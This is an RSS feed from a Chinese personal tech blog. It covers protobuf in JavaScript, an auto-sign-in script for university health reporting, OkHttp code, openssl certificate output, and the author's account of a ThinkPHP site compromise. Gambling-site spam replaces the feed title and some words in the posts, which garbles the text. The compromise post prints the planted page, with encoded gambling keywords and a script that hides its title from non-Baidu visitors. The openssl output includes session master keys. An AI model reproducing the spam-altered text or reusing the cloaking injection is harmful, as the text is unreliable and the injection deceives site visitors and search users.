美高梅4858官方网站|美高梅4858mgm博客-分享、记录生活的点滴 / zh-CN Sat, 08 Aug 2020 12:37:06 +0800 Sat, 08 Aug 2020 12:37:06 +0800 美高梅4858mgm 使用 protobuf —— 支撑 web 端交互使用 /js/1043.html /js/1043.html Sat, 08 Aug 2020 12:37:06 +0800 Chuwen 转载自:https://bobjin.com/blog/view/54737b708031d8931158129c5c44a843.html

ProtoBuf 概况

Protocol Buffer的简称。谷歌旗下的一款平台无关,语言无关,可扩展的序列化结构数据格式,适合用于数据存储,作为不同应用、语言之间相互通信的数据交换格式,序列化后的数据为二进制数据(pb格式的数据),类比XML、JSON。

protobuf最先支撑C++ C# Go JAVA Python PHP语言,最近发布的代码包又支撑了美高梅4858mgm,今天就来谈下,js怎么使用protobuf。

官网地址 https://developers.google.com/protocol-buffers/

安装protobuf编译器

从github上下载编译器源码安装包,https://github.com/protocolbuffers/protobuf/releases

编译安装, 目前仅支撑unix类型的系统。

定义一个.proto文件

address.proto文件

message Address
{
    required string province  = 1;
    required string city = 2;
    required string county = 3;
}

编译生成访问类文件

运行下面的命令

protoc --js_out=import_style=commonjs,binary:. address.proto

会当前目录生成

address_pb.js

其中的 --js_out 的语法如下:

--js_out=[OPTIONS:]output_dir
如上面的例子中的option为 import_style=commonjs,binary, "."为生成文件的目录,这里为当前目录

打包为web可用的js文件

前置条件:需要安装npm。npm一般在安装nodejs的时候就会自动安装。

安装库文件的引用库
npm install -g require

安装打包成前端使用的js文件
npm install -g browserify

安装protobuf的库文件
npm install google-protobuf

打包js文件export.js

var address = require('./address_pb');
module.exports = {
    DataProto: address
}

编译生成可用js文件
browserify exports.js -o address_main.js

API

普通类型字段(required/optional)

get{FIELD}() // return field value

set{FIELD}(value) // set field value to value

clear{FIELD}(value) // clear filed value

数组类型字段操作(repeated)

add{FIELD}(value) // add one value to field

clear{FIELD}List() // clear filed

get{FIELD}List() // return array of field values

setInterestList(array)// set array

序列化/反序列化

serializeBinary() // 序列化

deserializeBinary(bin) // 反序列化(静态方法)

调试

toObject() // 打印数据

使用

<html>  
    <head>  
        <script type="text/javascript" src="./js/person_main.js"></script> 
    </head>
    <body>
        protobuf
    </body>
        <script type="text/javascript">
            var address1 = new proto.Address();
            address1.setProvince("北京");
            address1.setCity("北京");
            address1.setCounty("海淀");
            console.log(address1.toObject());
        </script>
</html>
]]>
0 /js/1043.html#comments /feed/js/1043.html
江西省高校校园防疫自动签到PHP程序 /php/1041.html /php/1041.html Wed, 29 Jul 2020 11:24:00 +0800 Chuwen Jiangxi-University-Health-Check-in

请注意,学校都是我虚构的,我并不是在 南昌大学 {滑稽}

PHP版本 江西省普通高等学校 校园防疫 健康签到 自动签到程序,项目地址 https://github.com/PrintNow/Jiangxi-University-Health-Check-in

抓包过程

根据老师说的,在 支付宝 -> 江西省终身学习卡 -> 小程序 -> 校园防疫 -> 健康签到 进行签到

然后我就尝试 HttpCanary APP 对支付宝抓包,但是我发现,并不能正常抓包,直接阻断了,只抓到一条关于 alipay.com 域名的
然后小程序提示加载失败

我就想到了支付宝可能对抓包有所屏蔽,网上搜的解决办法就是要装 XposedMagisk
之类的进行解除限制,我手机还没解锁,要解锁还得清除手机所有数据
,嫌弃麻烦就没有再去折腾了

大概 2020-07-26 左右,心血来潮,就去解锁了,输入 TWRP,刷入 Magisk,一气呵成
,根据网上查找的资料,在 Magisk 安装某个模块,就会将用户安装的证书转换为系统证书,
这样就可以愉快的抓包了,但是我照着做了后,并没有用,还是阻断了,支付宝小程序那里提示 加载失败 好像

最后,我在 HttpCanary 设置里发现了说推荐使用 平行空间 进行抓包,我在平行空间将支付宝添加进去,然后使用 HttpCanary平行空间抓包,果不其然,抓到了数据
发现这个签到平台加载的是一个网页,然后我在 Chrome 打开,发现没有任何限制,可以直接打开。

请往下看分析过程

[...]

]]>
0 /php/1041.html#comments /feed/php/1041.html
Android 使用 OkHttp 进行网络请求之 POST json数据 /android/1040.html /android/1040.html Sun, 12 Jul 2020 17:38:41 +0800 Chuwen 相关代码
只是避免遗忘,然后记录下的,具体还是要自己去搜索
        OkHttpClient okHttpClient = new OkHttpClient();

        //指定媒体类型
        MediaType mediaType = MediaType.parse("application/json");
        RequestBody requestBody = RequestBody.create(mediaType, json);
        Request request = new Request.Builder()
                .url(url)
                .post(requestBody)
                .build();
        okHttpClient.newCall(request).enqueue(new Callback() {
            @Override
            public void onResponse(Call call, Response response) throws IOException {
                SetSuggesRes = response.body().string();

                Log.d("请求成功", SetSuggesRes);

                /**
                 * 在Ui线程更新UI
                 */
                runOnUiThread(new Runnable() {
                    @Override
                    public void run() {
                        requestDialog.hide();//隐藏那个加载对话框

                        try {
                            JSONObject resObj = new JSONObject(SetSuggesRes);

                            if (resObj.getString("RESULT").equals("S")) {
                                showNormalDialog("意见反馈", "意见反馈成功!", 1);
                            } else {
                                showNormalDialog("意见反馈", "意见反馈失败,原因:" + resObj.getString("ERRMSG").toString(), 2);
                            }
                        } catch (JSONException e) {
                            e.printStackTrace();
                            showNormalDialog("意见反馈", "意见反馈失败,原因(远程服务器返回内容不符合预期):\n"
                                    + e.getMessage().toString(), 2);
                        }
                    }
                });
            }

            @Override
            public void onFailure(Call call, final IOException e) {
                Log.d("请求失败", e.getMessage().toString());
                runOnUiThread(new Runnable() {
                    @Override
                    public void run() {
                        requestDialog.hide();
                        showNormalDialog("意见反馈", "意见反馈失败了,原因:\n" + e.getMessage(), 2);
                    }
                });
            }
        });
]]>
0 /android/1040.html#comments /feed/android/1040.html
Andoid 解决非主线程更新UI问题 /android/1039.html /android/1039.html Sun, 12 Jul 2020 17:37:21 +0800 Chuwen 使用以下代码即可
                runOnUiThread(new Runnable() {
                    @Override
                    public void run() {
                         //更新UI
                    }
                });
]]>
0 /android/1039.html#comments /feed/android/1039.html
Windows/Linux 等使用 openssl 命令查看网站证书 /uncategorized/1031.html /uncategorized/1031.html Thu, 09 Jul 2020 14:36:42 +0800 Chuwen 假设大家要查看 nowtime.cc 的证书,其 https 端口为 443

实行命令如下:

openssl s_client -showcerts -connect nowtime.cc:443

运行结果:

自行提取证书了 -----BEGIN CERTIFICATE----- -----END CERTIFICATE-----

首个是根证书

C:\Users\chuwen>openssl s_client -showcerts -connect nowtime.cc:443
CONNECTED(00000188)
depth=1 C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN = nowtime.cc
verify return:1
---
Certificate chain
 0 s:CN = nowtime.cc
   i:C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3
-----BEGIN CERTIFICATE-----
MIIFWzCCBEOgAwIBAgISBN4DHrdBlbZURCO30zWTHNcqMA0GCSqGSIb3DQEBCwUA
MEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQD
ExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzAeFw0yMDA2MjcwNTIwNDNaFw0y
MDA5MjUwNTIwNDNaMBUxEzARBgNVBAMTCm5vd3RpbWUuY2MwggEiMA0GCSqGSIb3
DQEBAQUAA4IBDwAwggEKAoIBAQDsIEKlS36Aay6UwWHLPYmsu9+3G3EA11236AD+
lLXEhEO4tAuc0FV5nliJ7mlXx9STvTtS/zzLqUDRVcWlBeXiS7UHjkvSN+sUU9rI
/osDO/Cd/NXo8DYqwBOZ+2DFX/Um1gi415HN2hEAP3KgbSXRFqiMO5NpXLPBYK7C
LtdpRIcvMtLKlFKmAARsqVd61gsN0WqYWaitnpjwGQG75KlhgJXqml6A7CiTikAS
JdW4vHg4uONqKnJ2qPK9a3b3L01pgqwU5k/NEmxWUrRFveFDqZTvja4ajgILZ9wG
CFUH3+0CpLCVVO7oG5jZ95Y2jzALpyMYotq/iRbxMwfbwhonAgMBAAGjggJuMIIC
ajAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMC
MAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFDFRcdtmSz9iTZXpz4D2KNXCqIABMB8G
A1UdIwQYMBaAFKhKamMEfd265tE5t6ZFZe/zqOyhMG8GCCsGAQUFBwEBBGMwYTAu
BggrBgEFBQcwAYYiaHR0cDovL29jc3AuaW50LXgzLmxldHNlbmNyeXB0Lm9yZzAv
BggrBgEFBQcwAoYjaHR0cDovL2NlcnQuaW50LXgzLmxldHNlbmNyeXB0Lm9yZy8w
IwYDVR0RBBwwGoIMKi5ub3d0aW1lLmNjggpub3d0aW1lLmNjMEwGA1UdIARFMEMw
CAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9j
cHMubGV0c2VuY3J5cHQub3JnMIIBBQYKKwYBBAHWeQIEAgSB9gSB8wDxAHcA8JWk
WfIA0YJAEC0vk4iOrUv+HUfjmeHQNKawqKqOsnMAAAFy9G9x2QAABAMASDBGAiEA
8n8ykwTPO0QKEFt6jJeJtfBn2cBMH2iPCHERy1CrR3ACIQDwPZs3YoWk1BlqIeC7
LugFyfjwCwmSKdXY+Ns/s9cdqgB2ALIeBcyLos2KIE6HZvkruYolIGdr2vpw57JJ
Uy3vi5BeAAABcvRvcc4AAAQDAEcwRQIgYW1/ISr9EJY7banQGDSs95RDQcNpE2uh
5pQi2jzRPTMCIQDpzJxIk9YmETGfrqkBnhYHszrtnlZ5P2ThSRs3lpOJTjANBgkq
hkiG9w0BAQsFAAOCAQEAMLVoRspbIOTy72LPBshrWGF3P3o5Z85mhRwKeCHd4w6/
XH3gopnKlQ6epNK/DkviXm+S71q3CgJloLze0PKULG9SkuRBA4LJKrP+QU6xMUgh
W9HqjOU6/+CqOtEMsQqVda7jCwUygLLhpcZJVGx3AiEGnivcUYZnlFraJyFXVe5Z
TDZSUAvcqxduWspfec3jKxdEt+CfLf1+Um1+n1Wid1PWHQzw0ycBYCm3DGKFrtDI
LRsaSaUGH7BdbjHJ/A0380xv6Nb86NdAqT273Wpo97IHA/6H4LNV94pe5hawpht8
Qw2m6DohubBYXBf+4AlgJKZFSPxWdHOd66kD0rBOAg==
-----END CERTIFICATE-----
 1 s:C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3
   i:O = Digital Signature Trust Co., CN = DST Root CA X3
-----BEGIN CERTIFICATE-----
MIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA/
MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMT
DkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0Nlow
SjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMT
GkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOC
AQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EF
q6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan/PQeGdxyGkOlZHP/uaZ6WA8
SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0
Z8h/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWA
a6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB/onkxEz0tNvjj
/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0T
AQH/BAgwBgEB/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIG
CCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNv
bTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9k
c3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf/EFWCFiRAw
VAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcC
ARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAz
MDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwu
Y3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsF
AAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJo
uM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr/1wXKtx8/
wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so/joWUoHOUgwu
X4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlG
PfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6
KOqkqm57TH2H3eDJAkSnh6/DNFu0Qg==
-----END CERTIFICATE-----
---
Server certificate
subject=CN = nowtime.cc

issuer=C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3

---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 3114 bytes and written 392 bytes
Verification error: unable to get local issuer certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 20 (unable to get local issuer certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 4AA5922EF7050399E3A09DCE51155BB98B51EE253019EFB444C62DA6023B3C2F
    Session-ID-ctx:
    Resumption PSK: B9B0D50AEFB17628674208CEB490771BBF8130E89DBA67F9BA9B902BEFA2F45658C35A21589F43239DC2672149F8F300
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 600 (seconds)
    TLS session ticket:
    0000 - e0 1c ce db 80 2b cd b1-11 af 49 73 0b 96 ab cc   .....+....Is....
    0010 - 4e 25 40 e0 ea 0f 87 25-03 e8 80 6c 92 62 c6 6a   N%@....%...l.b.j
    0020 - 1e 56 56 2c 10 e4 ad c8-90 4b 68 4c 4d e0 ac 69   .VV,.....KhLM..i
    0030 - 13 d1 fa aa 8a b4 29 05-50 12 cf d4 3f e6 1e 08   ......).P...?...
    0040 - 69 a3 0c a7 12 47 af 21-a6 e0 85 83 45 d3 c6 c3   i....G.!....E...
    0050 - be 72 19 aa db ec 04 ab-d3 33 0c 1b 92 db 3a 5b   .r.......3....:[
    0060 - 1a 5e c6 ff 61 68 87 fa-e0 00 ce 43 94 b4 5c 64   .^..ah.....C..\d
    0070 - 86 7f 56 88 ee 71 91 0b-b3 41 12 0d ae 77 b4 df   ..V..q...A...w..
    0080 - 61 84 0c 76 bf 12 70 f2-3d b8 b1 48 cd ff e2 7b   a..v..p.=..H...{
    0090 - ac d8 65 f8 61 c7 e7 8e-d3 06 98 35 fd d5 11 95   ..e.a......5....
    00a0 - 91 a2 d8 95 fc b9 5d ed-c2 4b 5d 45 d0 6e 02 99   ......]..K]E.n..
    00b0 - b1 2d a5 86 31 54 06 e1-7c 60 dc 81 01 49 9a 0b   .-..1T..|`...I..
    00c0 - 50 56 87 8d 3b 55 4d 8e-53 db c6 46 59 70 bf d1   PV..;UM.S..FYp..
    00d0 - b6 22 d5 36 71 66 d9 69-5d 91 3d 82 78 f7 3a d1   .".6qf.i].=.x.:.

    Start Time: 1594276699
    Timeout   : 7200 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
    Extended master secret: no
    Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: C937B1E7244B66542A204A57B63B6EECBEA34922740ACF0E95F8CEE676DAFE80
    Session-ID-ctx:
    Resumption PSK: 44BC6A3EB2CF2FEC82C1C08C58F25601921C3E8558AFA17ECF37B802B9A02E22B3537B267545803903764156A16FABB6
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 600 (seconds)
    TLS session ticket:
    0000 - e0 1c ce db 80 2b cd b1-11 af 49 73 0b 96 ab cc   .....+....Is....
    0010 - 24 07 ff 06 ff 62 e9 3c-fd 31 a1 93 c9 6b 5e 32   $....b.<.1...k^2
    0020 - 9f 77 1f 67 1a 95 44 e6-00 73 8f ac 0f 90 37 6f   .w.g..D..s....7o
    0030 - 6f a1 16 62 50 64 d7 0e-20 1f 5f 75 9f 47 85 98   o..bPd.. ._u.G..
    0040 - 84 d9 7b 7f e3 43 a9 d1-4e 58 4d 58 5f 19 8f fb   ..{..C..NXMX_...
    0050 - 4b d1 41 6b 93 45 27 8b-e0 7d a1 64 9b 2a f4 10   K.Ak.E'..}.d.*..
    0060 - b3 28 96 49 40 6f 88 27-4f b3 21 5a 38 3e c6 3c   .(.I@o.'O.!Z8>.<
    0070 - e8 43 f3 eb 69 e7 da be-c4 9a 64 b4 75 ad 79 69   .C..i.....d.u.yi
    0080 - 14 4e f8 1f cb 38 5f 33-80 18 ea b4 61 a9 ce ae   .N...8_3....a...
    0090 - 2d 43 66 83 dc 81 4c 15-7e d7 d3 8e 43 25 b2 16   -Cf...L.~...C%..
    00a0 - b0 a5 3d a4 1a f6 2b 5c-79 4b 83 46 77 ec 55 d3   ..=...+\yK.Fw.U.
    00b0 - 6b c5 ee 0f 17 46 3a c9-be 90 1f 07 f2 fc e9 2f   k....F:......../
    00c0 - 67 a5 de d8 ba 1f 6e 75-bb 74 42 b9 35 48 49 98   g.....nu.tB.5HI.
    00d0 - 85 25 b9 52 a5 05 e6 7e-e6 b2 5e 20 6e f9 38 35   .%.R...~..^ n.85

    Start Time: 1594276699
    Timeout   : 7200 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
    Extended master secret: no
    Max Early Data: 0
---
read R BLOCK

假设大家要查看 authme.wechall.net 的证书,其 https 端口为 443

实行命令如下:

openssl s_client -showcerts -connect authme.wechall.net:443

运行结果:

C:\Users\chuwen>openssl s_client -showcerts -connect authme.wechall.net:443
CONNECTED(00000180)
depth=1 C = DE, ST = LowerSaxony, L = Peine, O = WeChall, OU = development, CN = gizmore, emailAddress = gizmore@wechall.net
verify error:num=19:self signed certificate in certificate chain
verify return:1
depth=1 C = DE, ST = LowerSaxony, L = Peine, O = WeChall, OU = development, CN = gizmore, emailAddress = gizmore@wechall.net
verify return:1
depth=0 C = DE, ST = LowerSaxony, L = Frankfurt, O = WeChall, OU = development, CN = authme.wechall.net, emailAddress = gizmore@wechall.net
verify return:1
13132:error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure:ssl\record\rec_layer_s3.c:1536:SSL alert number 40
---
Certificate chain
 0 s:C = DE, ST = LowerSaxony, L = Frankfurt, O = WeChall, OU = development, CN = authme.wechall.net, emailAddress = gizmore@wechall.net
   i:C = DE, ST = LowerSaxony, L = Peine, O = WeChall, OU = development, CN = gizmore, emailAddress = gizmore@wechall.net
-----BEGIN CERTIFICATE-----
MIIELjCCA5cCCQDHMTcVkx1X2jANBgkqhkiG9w0BAQUFADCBkTELMAkGA1UEBhMC
REUxFDASBgNVBAgTC0xvd2VyU2F4b255MQ4wDAYDVQQHEwVQZWluZTEQMA4GA1UE
ChMHV2VDaGFsbDEUMBIGA1UECxMLZGV2ZWxvcG1lbnQxEDAOBgNVBAMTB2dpem1v
cmUxIjAgBgkqhkiG9w0BCQEWE2dpem1vcmVAd2VjaGFsbC5uZXQwHhcNMTQwNzI5
MDk0NjUzWhcNMjQwNzMxMDk0NjUzWjCBoDELMAkGA1UEBhMCREUxFDASBgNVBAgT
C0xvd2VyU2F4b255MRIwEAYDVQQHEwlGcmFua2Z1cnQxEDAOBgNVBAoTB1dlQ2hh
bGwxFDASBgNVBAsTC2RldmVsb3BtZW50MRswGQYDVQQDExJhdXRobWUud2VjaGFs
bC5uZXQxIjAgBgkqhkiG9w0BCQEWE2dpem1vcmVAd2VjaGFsbC5uZXQwggIiMA0G
CSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDfO6q9GnmHp3zsG+s2HJ/TJc3d5BhL
0UV+6PzfZSY5MFEg76wHPTsrasdn8z8uWQeMWprL3h4EWOlXW3YG9UOLjdvxkxL1
5vLJrxYdCu6jQ+KvoJtRzFXUDZcKjpDfnibgrUc18HW35FF5i2FkTpRFVP0p6INu
m8FsyHfN3NfytDBAZLNqBIDtNvXdZQKRDiJp/90x2Bgj0/TiiO6TzmX0f7Vt5ogb
ft6OhwsQm1HRzA1st1dpi0rTHM5bYw+ulldkY7ILrpES3sSukCBe1dVYxgzXM5xo
09iyPZkXzh+4h+J9Lt4rJlWWvlZJ6qoaC/bWrQE7U0JB9B/GFykguewaIt5QUMEx
njAyTEFzief4209mnCpysoq/yRyRygEMrAGW0jzhmyNWkrvvOiaygT2jICywBMbn
/wn8hQgxwDj5903xUdqtlLjgItcKMQNW3FvurjvDvuS/Vo5X+cQPZFluj28azRZ8
AUKwGuDCp4OiinJRukokC+kY+qLLSbxR9NhVq0Vi6+T/xHKazOwCCZ0w9T7eCldF
OV7Yd85S8FtI0CvD5egs04OfCdnAMW2DK+JGTcSLmdbPGTddk4je9Oqi6QnVi2Yv
hNBaupEOAknl6Yo+bQEXaMwi1sS3uhpmrIxu5p8jdtb4qCkxRcl9dJcUSn/HWK7/
YrgbgPMYMjfA5wIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAKiXqEGzNnPq0MxqQLcq
TxOF7H83MIXbHCIM4tJliYRm5wIs/Xg9koBT0Oi2PVXud3a/oOH0NBJTYF8bD0v0
s90fY8496QJs9BSVbTu4QWNZyvFpefBaO1fb0xeGlXFR8GHbUZ73rGLHE9qbZGrX
N7OyHBB6X0gXZ8lZ8nS49k3o
-----END CERTIFICATE-----
 1 s:C = DE, ST = LowerSaxony, L = Peine, O = WeChall, OU = development, CN = gizmore, emailAddress = gizmore@wechall.net
   i:C = DE, ST = LowerSaxony, L = Peine, O = WeChall, OU = development, CN = gizmore, emailAddress = gizmore@wechall.net
-----BEGIN CERTIFICATE-----
MIIDnDCCAwWgAwIBAgIJAMQYS3CTzcElMA0GCSqGSIb3DQEBBQUAMIGRMQswCQYD
VQQGEwJERTEUMBIGA1UECBMLTG93ZXJTYXhvbnkxDjAMBgNVBAcTBVBlaW5lMRAw
DgYDVQQKEwdXZUNoYWxsMRQwEgYDVQQLEwtkZXZlbG9wbWVudDEQMA4GA1UEAxMH
Z2l6bW9yZTEiMCAGCSqGSIb3DQEJARYTZ2l6bW9yZUB3ZWNoYWxsLm5ldDAeFw0x
NDA3MjkwOTA3MTRaFw0yNDA3MzEwOTA3MTRaMIGRMQswCQYDVQQGEwJERTEUMBIG
A1UECBMLTG93ZXJTYXhvbnkxDjAMBgNVBAcTBVBlaW5lMRAwDgYDVQQKEwdXZUNo
YWxsMRQwEgYDVQQLEwtkZXZlbG9wbWVudDEQMA4GA1UEAxMHZ2l6bW9yZTEiMCAG
CSqGSIb3DQEJARYTZ2l6bW9yZUB3ZWNoYWxsLm5ldDCBnzANBgkqhkiG9w0BAQEF
AAOBjQAwgYkCgYEAvdoWtpmxsCyhl8BFeZVqVk0JmVrkfls/uQVjzGiZ/9gV8G9A
REhNpQSWIBNdC52qv9xDVJmgGLAJhDL0Qhh7ia4F9W3Gt9ZOjGs4zT7ZkJwdr9r/
1N+7kwt1bd5pUEEiNHrqWppK9nh4DWueoOl/kGpOXRODkrR9lAdWnD+y4Z0CAwEA
AaOB+TCB9jAdBgNVHQ4EFgQUNGqLUeVuzA8iVTd94saA6ALAWMIwgcYGA1UdIwSB
vjCBu4AUNGqLUeVuzA8iVTd94saA6ALAWMKhgZekgZQwgZExCzAJBgNVBAYTAkRF
MRQwEgYDVQQIEwtMb3dlclNheG9ueTEOMAwGA1UEBxMFUGVpbmUxEDAOBgNVBAoT
B1dlQ2hhbGwxFDASBgNVBAsTC2RldmVsb3BtZW50MRAwDgYDVQQDEwdnaXptb3Jl
MSIwIAYJKoZIhvcNAQkBFhNnaXptb3JlQHdlY2hhbGwubmV0ggkAxBhLcJPNwSUw
DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCLt0cRKdertOduwl/jfwlT
2eadw5dBtCryDO9d5PTWTkJl89MyYmQszj4Kx7NC2Yc3JklLI2q+XSgTdzn7VJ1W
HM4sC8XboLQttzBkI160Jgl/dYNcjX22vH2h4W8bGlAnq3MCMrjZnFhgWQTosJWh
qovBkUnH+FVo7S9eW+60hg==
-----END CERTIFICATE-----
---
Server certificate
subject=C = DE, ST = LowerSaxony, L = Frankfurt, O = WeChall, OU = development, CN = authme.wechall.net, emailAddress = gizmore@wechall.net

issuer=C = DE, ST = LowerSaxony, L = Peine, O = WeChall, OU = development, CN = gizmore, emailAddress = gizmore@wechall.net

---
Acceptable client certificate CA names
C = DE, ST = LowerSaxony, L = Brunswick, O = CSTx, OU = development, CN = authme.wechall.net, emailAddress = christian@wechall.net
C = DE, ST = LowerSaxony, L = Peine, O = WeChall, OU = development, CN = gizmore, emailAddress = gizmore@wechall.net
Client Certificate Types: RSA sign, DSA sign, ECDSA sign
Requested Signature Algorithms: RSA+SHA512:DSA+SHA512:ECDSA+SHA512:RSA+SHA384:DSA+SHA384:ECDSA+SHA384:RSA+SHA256:DSA+SHA256:ECDSA+SHA256:RSA+SHA224:DSA+SHA224:ECDSA+SHA224:RSA+SHA1:DSA+SHA1:ECDSA+SHA1
Shared Requested Signature Algorithms: RSA+SHA512:DSA+SHA512:ECDSA+SHA512:RSA+SHA384:DSA+SHA384:ECDSA+SHA384:RSA+SHA256:DSA+SHA256:ECDSA+SHA256:RSA+SHA224:DSA+SHA224:ECDSA+SHA224:RSA+SHA1:DSA+SHA1:ECDSA+SHA1
Peer signing digest: SHA256
Peer signature type: RSA
Server Temp Key: ECDH, P-256, 256 bits
---
SSL handshake has read 3056 bytes and written 458 bytes
Verification error: self signed certificate in certificate chain
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 4096 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID:
    Session-ID-ctx:
    Master-Key: 1633D25BB4F817A340857CAF0C283284468941EF791EFDAF62E7F79FFE9C49C1727C5B78DF0DAC36A5C4BAD62CC6FDBB
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1594276479
    Timeout   : 7200 (sec)
    Verify return code: 19 (self signed certificate in certificate chain)
    Extended master secret: no
---
]]>
0 /uncategorized/1031.html#comments /feed/uncategorized/1031.html
记一次使用 ThinkPHP 5 框架被挂马 /chat/1026.html /chat/1026.html Thu, 09 Jul 2020 13:11:50 +0800 Chuwen 前言

全怪自己没有跟进更新 ThinkPHP 版本,导致被挂马,用的版本是 ThinkPHP V5.1.29 LTS

我是怎么发现的

也是听别人提起我这个网站,我才知道我还有这个网站,然后习惯的登录下看看,结果发现只有美高梅4858能打开,其它都 404,我还以为网站配置问题,我又删除了重新建立站点,发现还是一样

直到我看了下 public/ 目录
Snipaste_2020-07-09_13-19-22.png

我才发现 index.php 文件被删了,只留下 index.html 文件,其文件部分内容是:

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<title>&#30343;&#20896;&#66;&#69;&#84;&#51;&#54;&#57;&#44;&#30343;&#20896;&#98;&#101;&#116;&#23433;&#21331;&#29256;&#19979;&#36733;&#44;&#30343;&#20896;&#98;&#101;&#116;&#25163;&#26426;&#29256;&#19979;&#36733;</title>
<meta name="keywords" content="&#98;&#101;&#116;&#30343;&#20896;&#23448;&#32593;&#44;&#30343;&#20896;&#30331;&#38470;&#27880;&#20876;&#44;&#30343;&#20896;&#30495;&#20154;&#24179;&#21488;"/>
<meta name="description" content="&#98;&#101;&#116;&#30343;&#20896;&#23448;&#32593;&#12304;&#119;&#119;&#119;&#46;&#51;&#50;&#52;&#52;&#48;&#52;&#46;&#99;&#111;&#109;&#12305;&#30343;&#20896;&#30495;&#20154;&#24179;&#21488;&#44;&#30343;&#20896;&#30331;&#38470;&#27880;&#20876;&#44;&#30343;&#20896;&#30495;&#20154;&#24179;&#21488;&#44;&#30343;&#20896;&#30331;&#38470;&#27880;&#20876;&#44;&#98;&#101;&#116;&#30343;&#20896;&#20307;&#32946;&#23448;&#32593;&#44;&#98;&#101;&#116;&#30343;&#20896;&#20307;&#32946;&#19979;&#36733;&#44;&#30343;&#20896;&#30495;&#20154;&#24179;&#21488;&#44;&#30343;&#20896;&#30331;&#38470;&#27880;&#20876;&#44;&#98;&#101;&#116;&#30343;&#20896;&#20307;&#32946;&#23448;&#32593;&#19968;&#30452;&#33268;&#21147;&#20110;&#23089;&#20048;&#20107;&#19994;&#30340;&#21457;&#23637;&#12290;"/>
<meta property="og:image" content="https://*.nowtime.cc/logo.png"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="****1班"}</script>
